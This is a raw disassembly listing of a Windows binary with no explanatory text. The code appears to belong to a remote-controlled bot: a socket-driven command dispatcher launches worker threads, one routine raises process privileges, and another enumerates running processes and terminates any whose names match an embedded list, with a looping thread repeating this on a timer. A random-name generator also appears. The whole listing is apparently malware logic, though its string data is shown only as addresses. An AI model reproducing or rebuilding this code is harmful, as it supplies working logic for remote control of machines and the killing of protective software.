loc_41593C: ; CODE XREF: sub_40FCA3+5C7E�j
cmp [ebp+var_AC4], ebx
jz short loc_415934
jmp loc_4100FB
; ---------------------------------------------------------------------------
loc_415949: ; CODE XREF: sub_40FCA3+1402�j
; sub_40FCA3+1419�j
push [ebp+var_4] ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40CA90
push 437878h
call sub_40CB08
loc_415962: ; CODE XREF: sub_40FCA3+5813�j
add esp, 10h
jmp loc_415F22
; ---------------------------------------------------------------------------
loc_41596A: ; CODE XREF: sub_40FCA3+13D4�j
; sub_40FCA3+13EB�j
push [ebp+hFile]
lea eax, [ebp+var_418]
push 80h
push eax
call sub_417EDA
mov eax, [ebp+var_4]
mov esi, [ebp+esi+lpExistingFileName]
mov [ebp+var_390], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_41C], edi
mov [ebp+var_38C], eax
jz short loc_4159C1
push 437874h
push esi
call sub_417D80
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_394], eax
jmp short loc_4159C7
; ---------------------------------------------------------------------------
loc_4159C1: ; CODE XREF: sub_40FCA3+5D02�j
mov [ebp+var_394], ebx
loc_4159C7: ; CODE XREF: sub_40FCA3+5D1C�j
lea eax, [ebp+var_2EC]
push 437848h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 22h
push eax
call sub_41741F
add esp, 14h
mov [ebp+var_398], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_41C]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_41748A ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_398]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_415A38
call GetLastError
push eax
push 437800h
jmp loc_4148FF
; ---------------------------------------------------------------------------
loc_415A30: ; CODE XREF: sub_40FCA3+5D9B�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_415A38: ; CODE XREF: sub_40FCA3+5D7A�j
cmp [ebp+var_388], ebx
jz short loc_415A30
jmp loc_412742
; ---------------------------------------------------------------------------
loc_415A45: ; CODE XREF: sub_40FCA3+1354�j
; sub_40FCA3+136B�j
push 4315F8h
lea eax, [ebp+var_2EC]
push 4377D4h
push eax
call sub_41795B
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
add esp, 20h
jmp loc_412742
; ---------------------------------------------------------------------------
loc_415A7A: ; CODE XREF: sub_40FCA3+1326�j
; sub_40FCA3+133D�j
push dword ptr byte_445EDC+0D403Ch
call sub_40C21E
push eax
lea eax, [ebp+var_2EC]
push 437798h
push eax
call sub_41795B
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push edi ; s
call sub_40E1D6
add esp, 24h
jmp loc_412742
; ---------------------------------------------------------------------------
loc_415AB6: ; CODE XREF: sub_40FCA3+12F8�j
; sub_40FCA3+130F�j
mov esi, [ebp+esi+lpExistingFileName]
cmp esi, ebx
jz short loc_415AE6
cmp [ebp+var_C], ebx
jz short loc_415AF3
push esi
push [ebp+var_C]
call sub_417F60
pop ecx
cmp eax, ebx
pop ecx
jz short loc_415AF3
push eax ; char
push 43778Ch ; int
push edi ; s
call sub_40E190
add esp, 0Ch
jmp short loc_415AF3
; ---------------------------------------------------------------------------
loc_415AE6: ; CODE XREF: sub_40FCA3+5E1C�j
push 437FF8h ; int
push edi ; s
call sub_40E190
pop ecx
pop ecx
loc_415AF3: ; CODE XREF: sub_40FCA3+5E21�j
; sub_40FCA3+5E30�j ...
push 0FFFFFFFEh
pop eax
jmp loc_4100FE
; ---------------------------------------------------------------------------
loc_415AFB: ; CODE XREF: sub_40FCA3+12CA�j
; sub_40FCA3+12E1�j
push 437774h ; int
push edi ; s
call sub_40E190
push 437748h
call sub_40CB08
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_4100FE
; ---------------------------------------------------------------------------
loc_415B1B: ; CODE XREF: sub_40FCA3+129C�j
; sub_40FCA3+12B3�j
push 437730h ; int
push edi ; s
call sub_40E190
push 437708h
call sub_40CB08
add esp, 0Ch
xor eax, eax
jmp loc_4100FE
; ---------------------------------------------------------------------------
loc_415B3A: ; CODE XREF: sub_40FCA3+126E�j
; sub_40FCA3+1285�j
push [ebp+var_4] ; int
push [ebp+hFile] ; int
push edi ; s
call sub_407A07
loc_415B49: ; CODE XREF: sub_40FCA3+4260�j
add esp, 0Ch
jmp loc_415F22
; ---------------------------------------------------------------------------
loc_415B51: ; CODE XREF: sub_40FCA3+11BF�j
; sub_40FCA3+11D6�j
push [ebp+esi+lpExistingFileName]
push 21h
push 4376F8h
push 4376ECh
jmp short loc_415B79
; ---------------------------------------------------------------------------
loc_415B66: ; CODE XREF: sub_40FCA3+1191�j
; sub_40FCA3+11A8�j
push [ebp+esi+lpExistingFileName] ; int
push 1Eh ; int
push 4376E0h ; int
push 4376D0h ; int
loc_415B79: ; CODE XREF: sub_40FCA3+1023�j
; sub_40FCA3+104E�j ...
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+hFile] ; int
push edi ; s
loc_415B86: ; CODE XREF: sub_40FCA3+48DC�j
call sub_4176A7
add esp, 20h
jmp loc_4100FB
; ---------------------------------------------------------------------------
loc_415B93: ; CODE XREF: sub_40FCA3+FE0�j
; sub_40FCA3+FF7�j
cmp [ebp+esi+lpExistingFileName], ebx
jz short loc_415BBC
push [ebp+esi+lpExistingFileName]
call sub_417ECF
test eax, eax
pop ecx
jz short loc_415BBC
push [ebp+esi+lpExistingFileName]
call sub_417ECF
pop ecx
jmp short loc_415BC1
; ---------------------------------------------------------------------------
loc_415BBC: ; CODE XREF: sub_40FCA3+5EF7�j
; sub_40FCA3+5F08�j
mov eax, dword ptr unk_4315A0
loc_415BC1: ; CODE XREF: sub_40FCA3+5F17�j
mov esi, [ebp+esi+hFile]
mov [ebp+var_3A0], eax
cmp esi, ebx
jz short loc_415BE6
push esi
loc_415BD3: ; CODE XREF: sub_40FCA3+5F52�j
lea eax, [ebp+var_3B0]
push 10h
push eax
call sub_417EDA
add esp, 0Ch
jmp short loc_415BFD
; ---------------------------------------------------------------------------
loc_415BE6: ; CODE XREF: sub_40FCA3+5F2D�j
cmp [ebp+var_A5F], bl
jz short loc_415BF7
lea eax, [ebp+var_D4]
push eax
jmp short loc_415BD3
; ---------------------------------------------------------------------------
loc_415BF7: ; CODE XREF: sub_40FCA3+5F49�j
mov [ebp+var_3B0], bl
loc_415BFD: ; CODE XREF: sub_40FCA3+5F41�j
mov eax, [ebp+var_4]
push [ebp+hFile]
mov [ebp+var_394], eax
mov eax, [ebp+var_8]
mov [ebp+var_390], eax
lea eax, [ebp+var_430]
push 80h
push eax
mov [ebp+var_434], edi
call sub_417EDA
add esp, 0Ch
push [ebp+var_3A0]
push edi ; s
call sub_40B972
pop ecx
push eax
lea eax, [ebp+var_2EC]
push 42C024h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 13h
push eax
call sub_41741F
add esp, 1Ch
mov dword ptr [ebp+in.S_un], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_434]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_408943 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, dword ptr [ebp+in.S_un]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_415CAE
call GetLastError
push eax
push 437688h
jmp loc_41609D
; ---------------------------------------------------------------------------
loc_415CA6: ; CODE XREF: sub_40FCA3+6011�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_415CAE: ; CODE XREF: sub_40FCA3+5FF0�j
cmp [ebp+var_38C], ebx
jz short loc_415CA6
jmp loc_4100FB
; ---------------------------------------------------------------------------
loc_415CBB: ; CODE XREF: sub_40FCA3+F84�j
; sub_40FCA3+F9B�j ...
push dword ptr [ebp+arg_8]
push 43A614h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_415CE7
push dword ptr [ebp+arg_8]
push 437684h
call sub_417D80
pop ecx
mov [ebp+var_6D0], ebx
test eax, eax
pop ecx
jnz short loc_415CF1
loc_415CE7: ; CODE XREF: sub_40FCA3+6029�j
mov [ebp+var_6D0], 1
loc_415CF1: ; CODE XREF: sub_40FCA3+6042�j
push [ebp+hFile]
lea eax, [ebp+var_754]
push 80h
push eax
call sub_417EDA
mov eax, [ebp+var_4]
add esp, 0Ch
cmp [ebp+var_6D0], ebx
mov [ebp+var_6CC], eax
mov eax, [ebp+var_8]
mov [ebp+var_758], edi
mov [ebp+var_6C8], eax
mov eax, 437678h
jnz short loc_415D35
mov eax, 43766Ch
loc_415D35: ; CODE XREF: sub_40FCA3+608B�j
push eax
push 437644h
lea eax, [ebp+var_2EC]
push 200h
push eax
call sub_417EDA
push ebx
lea eax, [ebp+var_2EC]
push 1Ch
push eax
call sub_41741F
add esp, 1Ch
mov [ebp+var_6D4], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_758]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_416AC7 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_6D4]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_415DAC
call GetLastError
push eax
push 4371C0h
jmp loc_413B05
; ---------------------------------------------------------------------------
loc_415DA4: ; CODE XREF: sub_40FCA3+610F�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_415DAC: ; CODE XREF: sub_40FCA3+60EE�j
cmp [ebp+var_6C4], ebx
jz short loc_415DA4
jmp loc_4105FA
; ---------------------------------------------------------------------------
loc_415DB9: ; CODE XREF: sub_40FCA3+F56�j
; sub_40FCA3+F6D�j
push 431600h
lea eax, [ebp+var_2EC]
push 437624h
push eax
call sub_41795B
loc_415DCF: ; CODE XREF: sub_40FCA3+5867�j
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_412742
push ebx
lea eax, [ebp+var_2EC]
push [ebp+var_4]
push eax
push [ebp+hFile]
push edi
jmp loc_41273A
; ---------------------------------------------------------------------------
loc_415DF2: ; CODE XREF: sub_40FCA3+F28�j
; sub_40FCA3+F3F�j
mov esi, [ebp+esi+lpExistingFileName]
cmp esi, ebx
jz short loc_415E45
push esi
call sub_417ECF
cmp eax, ebx
pop ecx
jl short loc_415E3D
cmp eax, 2
jge short loc_415E3D
mov edx, dword ptr [ebp+lpNewFileName]
mov ecx, eax
shl ecx, 7
lea esi, [ecx+edx]
cmp [esi], bl
jz short loc_415E35
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2EC]
push 43A930h
push eax
call sub_41795B
mov [esi], bl
jmp short loc_415E91
; ---------------------------------------------------------------------------
loc_415E35: ; CODE XREF: sub_40FCA3+6177�j
push eax
push 4375E8h
jmp short loc_415E85
; ---------------------------------------------------------------------------
loc_415E3D: ; CODE XREF: sub_40FCA3+6163�j
; sub_40FCA3+6168�j
push eax
push 4375ACh
jmp short loc_415E85
; ---------------------------------------------------------------------------
loc_415E45: ; CODE XREF: sub_40FCA3+6158�j
mov eax, dword ptr [ebp+lpNewFileName]
xor esi, esi
mov [ebp+s], eax
loc_415E4D: ; CODE XREF: sub_40FCA3+61C9�j
push [ebp+var_94]
push [ebp+s]
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_415E70
add [ebp+s], 80h
inc esi
cmp esi, 2
jl short loc_415E4D
jmp short loc_415E94
; ---------------------------------------------------------------------------
loc_415E70: ; CODE XREF: sub_40FCA3+61BC�j
mov eax, dword ptr [ebp+lpNewFileName]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_D4]
push eax
push 43A930h
loc_415E85: ; CODE XREF: sub_40FCA3+15A2�j
; sub_40FCA3+5633�j ...
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
loc_415E91: ; CODE XREF: sub_40FCA3+6190�j
add esp, 0Ch
loc_415E94: ; CODE XREF: sub_40FCA3+15B7�j
; sub_40FCA3+5469�j ...
cmp [ebp+var_8], ebx
jnz loc_4105FA
push ebx
push [ebp+var_4]
loc_415EA1: ; CODE XREF: sub_40FCA3+57C9�j
lea eax, [ebp+var_2EC]
push eax
push [ebp+hFile]
push edi
jmp loc_412B11
; ---------------------------------------------------------------------------
loc_415EB4: ; CODE XREF: sub_40FCA3+EFA�j
; sub_40FCA3+F11�j
push [ebp+lpExistingFileName]
push 43A8A0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_415F22
call sub_4175E2
push ebx
call dword ptr byte_424150
loc_415ED6: ; CODE XREF: sub_40FCA3+ECC�j
; sub_40FCA3+EE3�j
push [ebp+esi+lpExistingFileName]
xor eax, eax
cmp [ebp+var_A50], bl
setnz al
push eax
lea eax, [ebp+var_450]
push dword ptr unk_4315C0
push eax
push edi
call sub_41689B
lea eax, [ebp+var_450]
push eax ; char
push 43A968h ; int
push edi ; s
call sub_40E190
lea eax, [ebp+var_450]
push eax
push 437578h
call sub_40CB7C
loc_415F1F: ; CODE XREF: sub_40FCA3+3528�j
; sub_40FCA3+59C3�j
add esp, 28h
loc_415F22: ; CODE XREF: sub_40FCA3+620�j
; sub_40FCA3+62C�j ...
mov eax, [ebp+arg_24]
jmp loc_4100FE
; ---------------------------------------------------------------------------
loc_415F2A: ; CODE XREF: sub_40FCA3+AC1�j
; sub_40FCA3+AD6�j
mov esi, [ebp+esi+lpExistingFileName]
cmp esi, ebx
mov [ebp+addr], esi
jz loc_4100FB
cmp [ebp+var_B8], ebx
jnz loc_4100FB
push 43A9ACh
push [ebp+var_94]
call sub_419260
mov esi, eax
push 440FACh
push ebx
inc esi
call sub_419260
push 437574h
push eax
call sub_419260
push [ebp+addr]
mov edi, eax
push 431614h
call sub_417D80
add esp, 20h
test eax, eax
jz short loc_415FD2
lea eax, [ebp+var_D4]
push edi
push eax
lea eax, [ebp+var_D4]
push eax ; char
push 43754Ch ; int
push [ebp+s] ; s
call sub_40E190
lea eax, [ebp+var_D4]
push eax ; char
push 437528h ; int
push [ebp+s] ; s
call sub_40E190
push edi
push esi
push 4374ECh
loc_415FBE: ; CODE XREF: sub_40FCA3+6388�j
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
add esp, 30h
jmp loc_4105FA
; ---------------------------------------------------------------------------
loc_415FD2: ; CODE XREF: sub_40FCA3+62E2�j
mov [ebp+arg_24], ebx
loc_415FD5: ; CODE XREF: sub_40FCA3+634F�j
mov eax, [ebp+arg_24]
push edi
push dword ptr [eax+4316C8h]
call sub_417772
pop ecx
test eax, eax
pop ecx
jnz short loc_41602D
add [ebp+arg_24], 4
cmp [ebp+arg_24], 4
jb short loc_415FD5
lea eax, [ebp+var_D4]
push edi
push eax
lea eax, [ebp+var_D4]
push eax ; char
push 43754Ch ; int
push [ebp+s] ; s
call sub_40E190
lea eax, [ebp+var_D4]
push eax ; char
push 437528h ; int
push [ebp+s] ; s
call sub_40E190
push edi
push esi
push 4374B0h
jmp short loc_415FBE
; ---------------------------------------------------------------------------
loc_41602D: ; CODE XREF: sub_40FCA3+6345�j
mov edi, dword ptr [ebp+lpNewFileName]
xor esi, esi
loc_416032: ; CODE XREF: sub_40FCA3+63B0�j
cmp [edi], bl
jnz short loc_416049
push [ebp+addr]
push 431614h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_41605A
loc_416049: ; CODE XREF: sub_40FCA3+6391�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_416032
jmp loc_4100FB
; ---------------------------------------------------------------------------
loc_41605A: ; CODE XREF: sub_40FCA3+63A4�j
shl esi, 7
add esi, dword ptr [ebp+lpNewFileName]
lea eax, [ebp+var_C70]
push 7Fh
push eax
push esi
call sub_419300
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_416091
push ebx ; int
push [ebp+var_4] ; int
push 437480h ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_416091: ; CODE XREF: sub_40FCA3+63D2�j
lea eax, [ebp+var_D4]
push eax
push 437450h
loc_41609D: ; CODE XREF: sub_40FCA3+578�j
; sub_40FCA3+5C8C�j ...
call sub_40CB7C
loc_4160A2: ; CODE XREF: sub_40FCA3+195A�j
pop ecx
loc_4160A3: ; CODE XREF: sub_40FCA3+2B57�j
pop ecx
jmp loc_4100FB
; ---------------------------------------------------------------------------
loc_4160A9: ; CODE XREF: sub_40FCA3+200�j
; sub_40FCA3+215�j
push dword ptr [ebp+arg_10] ; char
push 437440h ; int
push [ebp+s] ; s
call sub_40E190
push 43168Ch
push dword ptr [ebp+arg_10] ; char
push 437430h ; int
push [ebp+s] ; s
call sub_40E190
push [ebp+arg_C]
push dword ptr [ebp+arg_8] ; char
push 43A988h ; int
push [ebp+s] ; s
call sub_40E190
add esp, 2Ch
mov dword ptr byte_445EDC+0D41B4h, edi
jmp loc_40FF35
sub_40FCA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4160EF(LPCSTR lpName, int)
sub_4160EF proc near ; CODE XREF: sub_409990+45�p
; sub_409990+166�p ...
NewState = _TOKEN_PRIVILEGES ptr -14h
TokenHandle = dword ptr -4
lpName = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+TokenHandle]
push eax ; TokenHandle
push 28h ; DesiredAccess
call GetCurrentProcess ; GetCurrentProcess
push eax ; ProcessHandle
call OpenProcessToken ; OpenProcessToken
test eax, eax
jnz short loc_41610E
leave
retn
; ---------------------------------------------------------------------------
loc_41610E: ; CODE XREF: sub_4160EF+1B�j
lea eax, [ebp+NewState.Privileges]
push esi
push eax ; lpLuid
xor esi, esi
push [ebp+lpName] ; lpName
push esi ; lpSystemName
call LookupPrivilegeValueA ; LookupPrivilegeValueA
test eax, eax
jz short loc_41614C
cmp [ebp+arg_4], esi
mov [ebp+NewState.PrivilegeCount], 1
jz short loc_416135
or [ebp+NewState.Privileges.Attributes], 2
jmp short loc_416139
; ---------------------------------------------------------------------------
loc_416135: ; CODE XREF: sub_4160EF+3E�j
and [ebp+NewState.Privileges.Attributes], 0FFFFFFFDh
loc_416139: ; CODE XREF: sub_4160EF+44�j
push esi ; ReturnLength
push esi ; PreviousState
lea eax, [ebp+NewState]
push esi ; BufferLength
push eax ; NewState
push esi ; DisableAllPrivileges
push [ebp+TokenHandle] ; TokenHandle
call AdjustTokenPrivileges ; AdjustTokenPrivileges
mov esi, eax
loc_41614C: ; CODE XREF: sub_4160EF+32�j
push [ebp+TokenHandle]
call dword ptr byte_424074+4
mov eax, esi
pop esi
leave
retn
sub_4160EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41615A(SOCKET s, int, int, int, int, int)
sub_41615A proc near ; CODE XREF: sub_40FCA3+4E19�p
; sub_416380+74�p ...
var_550 = dword ptr -550h
me = MODULEENTRY32 ptr -350h
pe = PROCESSENTRY32 ptr -12Ch
hSnapshot = dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 550h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp CreateToolhelp32Snapshot, ebx
lea edi, [ebp+pe.cntUsage]
mov [ebp+pe.dwSize], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+me.th32ModuleID]
mov [ebp+me.dwSize], ebx
rep stosd
jz loc_41634C
cmp Process32First, ebx
jz loc_41634C
cmp Process32Next, ebx
jz loc_41634C
push 1 ; int
push offset byte_42D630 ; lpName
call sub_4160EF
pop ecx
pop ecx
push ebx ; th32ProcessID
push 0Fh ; dwFlags
call CreateToolhelp32Snapshot ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+hSnapshot], edi
jz loc_41633F
lea eax, [ebp+pe]
mov [ebp+pe.dwSize], 128h
push eax ; lppe
push edi ; hSnapshot
call Process32First ; Process32First
mov esi, dword ptr byte_424074+4
test eax, eax
jz loc_41633A
lea eax, [ebp+pe]
push eax ; lppe
push edi ; hSnapshot
call Process32Next ; Process32Next
test eax, eax
jz loc_41633A
mov ebx, OpenProcess
loc_416219: ; CODE XREF: sub_41615A+1D8�j
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_416279
loc_416220: ; CODE XREF: sub_41615A+E6�j
push dword ptr [edi+43A9C0h]
lea eax, [ebp+pe.szExeFile]
push eax
call lstrcmpi ; lstrcmpi
test eax, eax
jz short loc_416247
add edi, 4
cmp edi, 9C0h
jb short loc_416220
jmp loc_416320
; ---------------------------------------------------------------------------
loc_416247: ; CODE XREF: sub_41615A+DB�j
push [ebp+pe.th32ProcessID] ; dwProcessId
push 0 ; bInheritHandle
push 1F0FFFh ; dwDesiredAccess
call ebx ; OpenProcess
mov edi, eax
test edi, edi
jz loc_416320
push 0 ; uExitCode
push edi ; hProcess
call TerminateProcess ; TerminateProcess
test eax, eax
jnz loc_416320
loc_416271: ; CODE XREF: sub_41615A+1AC�j
push edi
call esi
jmp loc_416320
; ---------------------------------------------------------------------------
loc_416279: ; CODE XREF: sub_41615A+C4�j
cmp [ebp+arg_C], edi
jnz loc_41630B
cmp [ebp+arg_4], edi
jz loc_416320
push [ebp+pe.th32ProcessID] ; th32ProcessID
push 8 ; dwFlags
call CreateToolhelp32Snapshot ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov edi, eax
mov [ebp+me.dwSize], 224h
jz short loc_4162CB
lea eax, [ebp+me]
push eax ; lpme
push edi ; hSnapshot
call Module32First ; Module32First
push [ebp+pe.th32ProcessID]
test eax, eax
jz short loc_4162D1
lea eax, [ebp+me.szExePath]
jmp short loc_4162D7
; ---------------------------------------------------------------------------
loc_4162CB: ; CODE XREF: sub_41615A+14F�j
push [ebp+pe.th32ProcessID]
loc_4162D1: ; CODE XREF: sub_41615A+167�j
lea eax, [ebp+pe.szExeFile]
loc_4162D7: ; CODE XREF: sub_41615A+16F�j
push eax
lea eax, [ebp+var_550]
push 43D478h
push eax
call sub_41795B
add esp, 10h
lea eax, [ebp+var_550]
push 1 ; int
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
jmp loc_416271
; ---------------------------------------------------------------------------
loc_41630B: ; CODE XREF: sub_41615A+122�j
push [ebp+arg_C]
lea eax, [ebp+pe.szExeFile]
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_416353
loc_416320: ; CODE XREF: sub_41615A+E8�j
; sub_41615A+100�j ...
lea eax, [ebp+pe]
push eax ; lppe
push [ebp+hSnapshot] ; hSnapshot
call Process32Next ; Process32Next
test eax, eax
jnz loc_416219
xor ebx, ebx
loc_41633A: ; CODE XREF: sub_41615A+9D�j
; sub_41615A+B3�j
push [ebp+hSnapshot]
call esi
loc_41633F: ; CODE XREF: sub_41615A+77�j
push ebx ; int
push offset byte_42D630 ; lpName
call sub_4160EF
pop ecx
pop ecx
loc_41634C: ; CODE XREF: sub_41615A+3A�j
; sub_41615A+46�j ...
xor eax, eax
loc_41634E: ; CODE XREF: sub_41615A+224�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416353: ; CODE XREF: sub_41615A+1C4�j
push [ebp+pe.th32ProcessID] ; dwProcessId
push 0 ; bInheritHandle
push 1F0FFFh ; dwDesiredAccess
call ebx ; OpenProcess
push [ebp+hSnapshot]
mov edi, eax
call esi
push 0 ; uExitCode
push edi ; hProcess
call TerminateProcess ; TerminateProcess
test eax, eax
jnz short loc_41637B
push edi
call esi
jmp short loc_41634C
; ---------------------------------------------------------------------------
loc_41637B: ; CODE XREF: sub_41615A+21A�j
xor eax, eax
inc eax
jmp short loc_41634E
sub_41615A endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_416380(LPVOID)
sub_416380 proc near ; DATA XREF: sub_40FCA3+5AB5�o
var_298 = dword ptr -298h
s = dword ptr -98h
var_94 = dword ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+s]
push 43D4F4h
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_298]
push eax
call sub_41795B
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_4163DF
push esi ; int
lea eax, [ebp+var_298]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_94]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_4163DF: ; CODE XREF: sub_416380+3D�j
push [ebp+var_10] ; int
lea eax, [ebp+var_94]
push esi ; int
push esi ; int
push [ebp+var_C] ; int
push eax ; int
push [ebp+s] ; s
call sub_41615A
add esp, 18h
test eax, eax
lea eax, [ebp+var_298]
jnz short loc_41640D
push 43D4BCh
jmp short loc_416412
; ---------------------------------------------------------------------------
loc_41640D: ; CODE XREF: sub_416380+84�j
push 43D484h
loc_416412: ; CODE XREF: sub_416380+8B�j
push eax
call sub_41795B
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_41643F
push esi ; int
lea eax, [ebp+var_298]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_94]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_41643F: ; CODE XREF: sub_416380+9D�j
lea eax, [ebp+var_298]
push eax
call sub_40CB08
push [ebp+var_14]
call sub_417735
pop ecx
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
sub_416380 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41645E(DWORD dwProcessId)
sub_41645E proc near ; CODE XREF: sub_40FCA3+4DBB�p
; sub_41755A+4D�p
dwProcessId = dword ptr 4
push esi
push edi
push [esp+8+dwProcessId] ; dwProcessId
xor edi, edi
inc edi
push 0 ; bInheritHandle
push 1F0FFFh ; dwDesiredAccess
call OpenProcess ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_416490
push 0 ; uExitCode
push esi ; hProcess
call TerminateProcess ; TerminateProcess
test eax, eax
jnz short loc_416490
push esi
xor edi, edi
call dword ptr byte_424074+4
loc_416490: ; CODE XREF: sub_41645E+1A�j
; sub_41645E+27�j
mov eax, edi
pop edi
pop esi
retn
sub_41645E endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall sub_416495(LPVOID)
sub_416495 proc near ; DATA XREF: sub_40F1EA+46A�o
push esi
xor esi, esi
loc_416498: ; CODE XREF: sub_416495+1E�j
push 1 ; int
push esi ; int
push esi ; int
push esi ; int
push esi ; int
push esi ; s
call sub_41615A
add esp, 18h
push dword_43A9B8 ; dwMilliseconds
call Sleep ; Sleep
jmp short loc_416498
sub_416495 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4164B5 proc near ; CODE XREF: .text:00403C8F�p
; .text:00404233�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call GetTickCount ; GetTickCount
push eax
call sub_4179AD
pop ecx
call sub_4179B7
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul qword ptr unk_424690
call sub_4183B0
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_4164B5 endp
; ---------------------------------------------------------------------------
push esi
push edi
call GetTickCount ; GetTickCount
push eax
call sub_4179AD
mov edi, [esp+14h]
mov dword ptr [esp], 51A08Ch
push offset unk_42744C
push 1Ch
push edi
call sub_417EDA
xor esi, esi
add esp, 10h
cmp dword_4315BC, esi
jle short loc_41654B
loc_416525: ; CODE XREF: .text:00416549�j
call sub_4179B7
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset unk_43D564
push 1Ch
push edi
call sub_417EDA
add esp, 14h
inc esi
cmp esi, dword_4315BC
jl short loc_416525
loc_41654B: ; CODE XREF: .text:00416523�j
mov eax, edi
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_416550 proc near ; CODE XREF: sub_40FCA3+3F69�p
arg_4 = dword ptr 8
push ebx
push esi
push edi
call GetTickCount ; GetTickCount
push eax
call sub_4179AD
pop ecx
call sub_4179B7
push 3
mov ebx, [esp+10h+arg_4]
cdq
pop ecx
xor edi, edi
idiv ecx
mov esi, edx
add esi, dword_4315BC
test esi, esi
jle short loc_416593
loc_41657D: ; CODE XREF: sub_416550+41�j
call sub_4179B7
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_41657D
loc_416593: ; CODE XREF: sub_416550+2B�j
and byte ptr [edi+ebx], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_416550 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
